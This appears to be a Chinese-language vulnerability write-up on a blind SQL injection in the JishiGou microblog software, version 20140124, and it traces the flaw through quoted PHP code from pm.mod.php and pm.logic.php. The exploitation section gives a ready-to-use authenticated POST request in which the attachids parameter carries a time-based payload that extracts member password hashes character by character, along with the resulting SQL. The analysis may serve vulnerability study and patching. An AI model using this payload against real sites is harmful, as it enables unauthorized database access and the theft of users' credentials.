测试版本: 20140124
1.分析:
文件名:pm.mod.php
..........以上省略 .......... load::logic('pm'); $PmLogic = new PmLogic(); $pmid = $this->Post['pmid']; if($che = $this->Post['che']){ $this->Post['to_user'] = implode(",",$che); //发送的账号名 } $this->Post['message'] = jpost('message', 'txt'); //内容 if($pmid > 0){ $return = $PmLogic->pmSendAgain($this->Post); }else{ $return = $PmLogic->pmSend($this->Post); //不设置pmid值的话进到pmSend函数里 我们进去看看 } ..........以下省略 ..........
//master.mod.php
$this->Get = &$_GET;
$this->Post = &$_POST;
--------------------------------------------------
文件名:pm.logic.php
..........以上省略 .......... $to_user_list=array(); . .........中间省略 .......... foreach($to_user_list as $to_user_id => $to_user_name) { $data = array( "msgfrom" =>$susername, "msgnickname"=>$snickname, "msgfromid" =>$suid, "msgto" => $to_user_name['username'], "tonickname" => $to_user_name['nickname'], "msgtoid" => $to_user_id, 'imageids' => $post['imageids'], 'attachids' => $post['attachids'], // "subject" => $post['subject'], post的值是由pm.mod.php传过来的 我们继续往下看 "message" => $post['message'], / "new"=>'1', "dateline"=>$time, ); . .........中间省略 .......... #标记音乐和附件,使清缓存的时候不会把附件删除 if($data['imageids']){ DB::query("update `".TABLE_PREFIX."topic_image` set `tid` = -1 where `id` in ({$data['imageids']})"); //没有使用单引号 ,也没过滤变量直接入口了 } if($data['attachids']){ DB::query("update `".TABLE_PREFIX."topic_attach` set `tid` = -1 where `id` in ({$data['attachids']})"); //没有使用单引号 ,也没过滤变量直接入库了 }
由于程序如果执行报错的话 就会被记录在文件里 所以只好盲注入了
2.利用 :
需要登录的情况下
ajax.php?mod=pm&code=do_add
POST提交
to_user=admin&message=eeeeeeeeeeeeeeeeeeeeee&save_to_outbox=0&imageids=1&attachids=SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members
执行的sql语句:
update `jishigou_topic_attach` set `tid` = -1 where `id` in (SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members)
评论 (0)